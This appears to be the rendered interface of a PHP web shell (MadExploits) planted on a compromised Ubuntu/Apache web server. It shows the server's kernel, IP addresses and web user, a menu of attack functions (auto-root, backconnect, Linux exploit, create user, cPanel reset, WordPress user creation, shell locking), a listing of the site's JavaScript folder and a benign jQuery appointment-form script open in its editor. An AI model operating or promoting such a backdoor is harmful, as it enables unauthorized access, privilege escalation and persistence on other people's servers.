Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.253.119
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
justhub /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap.native-master
[ DIR ]
drwxr-xr-x
own-carousel-1.0.0
[ DIR ]
drwxr-xr-x
appointment.form.js
1.81
KB
-rw-r--r--
blog.js
120
B
-rw-r--r--
bootstrap.bundle.min.js
77.74
KB
-rw-r--r--
bootstrap.min.js
58.6
KB
-rw-r--r--
category_page.js
184
B
-rw-r--r--
check_overflow.js
2.36
KB
-rw-r--r--
contact.form.js
1.76
KB
-rw-r--r--
custom.js
4.19
KB
-rw-r--r--
detail_page.js
0
B
-rw-r--r--
easyzoom.js
3.98
KB
-rw-r--r--
gtag.js
146
B
-rw-r--r--
head.js.php
209
B
-rw-r--r--
home_scripts.js
3.14
KB
-rw-r--r--
imagesloaded.pkgd.min.js
5.43
KB
-rw-r--r--
isotope.pkgd.min.js
34.49
KB
-rw-r--r--
jquery-3.6.js
126.34
KB
-rw-r--r--
jquery.counterup.min.js
1.04
KB
-rw-r--r--
jquery.easypiechart.min.js
3.9
KB
-rw-r--r--
jquery.js
86.76
KB
-rw-r--r--
jquery.magnific-popup.min.js
19.76
KB
-rw-r--r--
jquery.min.js
82.37
KB
-rw-r--r--
jquery.nav.js
6.61
KB
-rw-r--r--
lightslider.js
46.96
KB
-rw-r--r--
main.js
13.12
KB
-rw-r--r--
modernizr-2.8.3.min.js
15.15
KB
-rw-r--r--
owl.carousel.min.js
41.76
KB
-rw-r--r--
particles.min.js
22.82
KB
-rw-r--r--
plugins.js
2.73
KB
-rw-r--r--
pointer.js
2.7
KB
-rw-r--r--
popper.min.js
20.76
KB
-rw-r--r--
rsmenu-main.js
4.3
KB
-rw-r--r--
script.js
599
B
-rw-r--r--
showmoreless.js
6.07
KB
-rw-r--r--
skill.bars.jquery.js
2.01
KB
-rw-r--r--
slick.min.js
40.97
KB
-rw-r--r--
swiper.min.js
138.17
KB
-rw-r--r--
time-circle.js
33.23
KB
-rw-r--r--
waypoints.min.js
7.86
KB
-rw-r--r--
wow.min.js
8.24
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : appointment.form.js
/** * * ----------------------------------------------------------------------------- * * Template : Braintech - IT Solutions and Technology Startup HTML Template * Author : rs-theme * Author URI : http://www.rstheme.com/ * * ----------------------------------------------------------------------------- * **/ (function($) { 'use strict'; // Get the form. var form = $('#appointment-form'); // Get the messages div. var formMessages = $('#appointment-messages'); // Set up an event listener for the contact form. $(form).submit(function(e) { // Stop the browser from submitting the form. e.preventDefault(); // Serialize the form data. var formData = $(form).serialize(); // Submit the form using AJAX. $.ajax({ type: 'POST', url: $(form).attr('action'), data: formData }) .done(function(response) { // Make sure that the formMessages div has the 'success' class. $(formMessages).removeClass('error'); $(formMessages).addClass('success'); // Set the message text. $(formMessages).text(response); // Clear the form. $('#appointment_name, #appointment_email, #appointment_phone, #appointment_website').val(''); }) .fail(function(data) { // Make sure that the formMessages div has the 'error' class. $(formMessages).removeClass('success'); $(formMessages).addClass('error'); // Set the message text. if (data.responseText !== '') { $(formMessages).text(data.responseText); } else { $(formMessages).text('Oops! An error occured and your message could not be sent.'); } }); }); })(jQuery);
Close